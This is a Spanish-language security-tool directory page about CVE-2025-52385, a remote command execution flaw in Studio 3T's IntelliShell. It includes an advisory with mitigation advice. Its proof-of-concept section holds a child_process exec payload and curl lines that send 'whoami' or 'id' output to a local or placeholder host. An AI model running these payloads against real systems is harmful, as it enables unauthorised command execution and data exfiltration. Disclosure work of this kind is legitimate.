Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-52385 — Studio 3T v.2025.1.0 | Kitploit
Herramientas/GitHubGitHub/kov404/cve-2025-52385
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubkov404/cve-2025-52385

CVE-2025-52385

Studio 3T v.2025.1.0

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-52385

Software: Studio 3T v.2025.1.0

Informe de vulnerabilidad: Ejecución remota de comandos en Studio 3T

Descripción general Una vulnerabilidad crítica en Studio 3T versión 2025.1.0 y anteriores permite que un atacante remoto ejecute código arbitrario a través de una carga útil manipulada que explota el módulo child_process en el componente IntelliShell.

Detalles Tipo de vulnerabilidad: Ejecución remota de comandos Producto afectado: Studio 3T, versión <= 2025.1.0 Componente afectado: IntelliShell Tipo de ataque: Remoto Impactos: Ejecución de código: Sí Denegación de servicio: Sí Escalada de privilegios: Sí

Descripción La vulnerabilidad permite a un atacante remoto ejecutar comandos arbitrarios del sistema operativo mediante el envío de una carga útil de JavaScript maliciosa a través de IntelliShell, aprovechando el módulo child_process. Es una vulnerabilidad de ejecución ciega, lo que significa que no se devuelve ninguna salida directa al atacante. Vector de ataque

Establecer una conexión a una instancia de MongoDB. Enviar una carga útil de JavaScript maliciosa a través de IntelliShell que utilice el módulo child_process para ejecutar comandos arbitrarios del sistema operativo.

Prueba de concepto Para verificar la vulnerabilidad, siga los siguientes pasos:

Configure un servidor HTTP local:python3 -m http.server 80

Ejecute la siguiente carga útil de JavaScript en IntelliShell: const {exec} = require('child_process'); exec('curl 127.0.0.1/$(whoami)', (error, stdout, stderr) => console.log(stdout));

Alternativamente, use el siguiente comando como vector de verificación:curl http://site/$(id) Referencias

Sitio web oficial de Studio 3T

Repositorio de Studio 3T en GitHub

CWE-78: Inyección de comandos del sistema operativo

CWE-94: Inyección de código

Mitigación Usuarios: Actualice a una versión parcheada de Studio 3T (si está disponible) o evite usar IntelliShell con conexiones MongoDB no confiables. Proveedores: Restrinja o sanitice las entradas al módulo child_process en IntelliShell para prevenir la ejecución no autorizada de comandos.

Agradecimientos Esta vulnerabilidad fue descubierta y reportada por Kaio Mendonca Pereira.

Descargar herramienta